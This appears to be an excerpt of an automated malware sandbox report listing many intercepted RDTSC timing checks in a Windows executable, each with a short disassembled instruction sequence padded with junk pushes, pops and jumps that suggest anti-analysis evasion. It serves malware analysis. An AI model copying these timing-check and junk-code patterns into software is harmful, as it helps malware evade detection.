                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F91C second address: 131F951 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E489A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5CB8E489A1h 0x00000010 jo 00007F5CB8E48996h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F951 second address: 131F955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F955 second address: 131F95F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F95F second address: 131F976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4DDA3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F976 second address: 131F995 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5CB8E489A5h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8E4B second address: 12C8E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 mov edi, 7F5B9A80h 0x0000000d pushad 0x0000000e mov eax, dword ptr [ebp+122D3851h] 0x00000014 movsx ebx, si 0x00000017 popad 0x00000018 push 00000004h 0x0000001a or ecx, dword ptr [ebp+122D2A7Ch] 0x00000020 nop 0x00000021 push ebx 0x00000022 jmp 00007F5CB8E4DDA9h 0x00000027 pop ebx 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F5CB8E4DDA0h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131FE89 second address: 131FECA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5CB8E48996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5CB8E4899Bh 0x0000000f popad 0x00000010 pushad 0x00000011 jns 00007F5CB8E4899Eh 0x00000017 jnp 00007F5CB8E489A9h 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1320976 second address: 1320997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4DD9Eh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jo 00007F5CB8E4DD96h 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1320997 second address: 13209B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5CB8E489A0h 0x00000009 jo 00007F5CB8E48996h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13209B1 second address: 13209D8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5CB8E4DD96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007F5CB8E4DDA8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132740C second address: 1327418 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1327418 second address: 132741C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132741C second address: 1327422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132756B second address: 1327575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1327575 second address: 13275BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jne 00007F5CB8E48996h 0x0000000c pop edi 0x0000000d je 00007F5CB8E4899Ch 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F5CB8E4899Dh 0x0000001b jg 00007F5CB8E48996h 0x00000021 popad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F5CB8E4899Dh 0x0000002a jbe 00007F5CB8E48998h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13275BD second address: 13275E5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5CB8E4DDA4h 0x00000008 jmp 00007F5CB8E4DD9Ch 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5CB8E4DDA0h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13275E5 second address: 13275E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1327A03 second address: 1327A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5CB8E4DD96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1327A0D second address: 1327A1C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5CB8E48996h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13282A0 second address: 13282BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007F5CB8E4DDA6h 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13282BE second address: 13282D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4899Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13282D0 second address: 13282D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13282D6 second address: 13282DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1328845 second address: 1328849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1328849 second address: 132884D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132884D second address: 1328853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1328B07 second address: 1328B0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1328DAB second address: 1328DEF instructions: 0x00000000 rdtsc 0x00000002 js 00007F5CB8E4DD96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b pushad 0x0000000c jng 00007F5CB8E4DD9Eh 0x00000012 jnc 00007F5CB8E4DDA2h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5CB8E4DDA0h 0x0000001f jng 00007F5CB8E4DD96h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331DF6 second address: 1331DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331681 second address: 1331689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339EBC second address: 1339EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339EC2 second address: 1339EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339EC6 second address: 1339EE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b push ecx 0x0000000c pushad 0x0000000d jmp 00007F5CB8E489A2h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13382DD second address: 13382E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338575 second address: 1338579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13386D0 second address: 13386D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13386D4 second address: 13386E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5CB8E48996h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13386E0 second address: 13386E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13386E6 second address: 13386F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5CB8E48996h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13386F0 second address: 1338714 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F5CB8E4DD96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F5CB8E4DDA2h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1338888 second address: 13388BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5CB8E489A7h 0x0000000d jmp 00007F5CB8E489A6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13388BD second address: 13388C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13388C1 second address: 13388D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5CB8E48996h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13388D4 second address: 13388E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jbe 00007F5CB8E4DD96h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13388E6 second address: 13388EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134131A second address: 134133C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F5CB8E4DDA8h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 134133C second address: 1341340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1353048 second address: 135304E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135304E second address: 1353080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F5CB8E48998h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e jng 00007F5CB8E48996h 0x00000014 jmp 00007F5CB8E489A7h 0x00000019 push eax 0x0000001a pop eax 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1352A9C second address: 1352AB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4DDA6h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1360ACA second address: 1360B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E489A9h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F5CB8E489A7h 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1360B05 second address: 1360B0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1360B0A second address: 1360B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F5CB8E4899Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1360B2B second address: 1360B31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1360B31 second address: 1360B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1360B37 second address: 1360B3E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1360B3E second address: 1360B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1365550 second address: 136555A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136555A second address: 136555E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136555E second address: 136556E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jo 00007F5CB8E4DD96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136B945 second address: 136B978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4899Eh 0x00000009 push edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5CB8E489A1h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136BC63 second address: 136BC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136BC67 second address: 136BC6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136BC6B second address: 136BC82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5CB8E4DDA1h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136BC82 second address: 136BC88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136BC88 second address: 136BC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136CA8B second address: 136CA8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136CA8F second address: 136CAC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4DDA6h 0x00000007 jmp 00007F5CB8E4DDA7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1370320 second address: 1370338 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5CB8E48996h 0x00000008 jnp 00007F5CB8E48996h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jc 00007F5CB8E4899Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D579 second address: 137D57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D57D second address: 137D59B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F5CB8E489A8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A1F5 second address: 138A1F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A1F9 second address: 138A203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138A203 second address: 138A207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138CEBD second address: 138CEC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138CEC6 second address: 138CED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5CB8E4DD96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138CED0 second address: 138CED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D851 second address: 139D85B instructions: 0x00000000 rdtsc 0x00000002 js 00007F5CB8E4DD96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139C68D second address: 139C694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139C694 second address: 139C69F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139C97B second address: 139C97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139C97F second address: 139C987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139CAF3 second address: 139CB2E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F5CB8E489A9h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F5CB8E489B9h 0x00000011 pushad 0x00000012 jmp 00007F5CB8E489A3h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139CCAD second address: 139CCB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139CCB1 second address: 139CCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4899Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jbe 00007F5CB8E48996h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139CCD3 second address: 139CCD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D16A second address: 139D17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F5CB8E48996h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D45D second address: 139D461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D461 second address: 139D475 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F5CB8E48996h 0x0000000e jbe 00007F5CB8E48996h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139EF8A second address: 139EF90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0783 second address: 13A07B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F5CB8E489A4h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5CB8E489A1h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A07B8 second address: 13A07BE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A07BE second address: 13A07C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A07C4 second address: 13A07CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A07CC second address: 13A07D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A3225 second address: 13A322A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
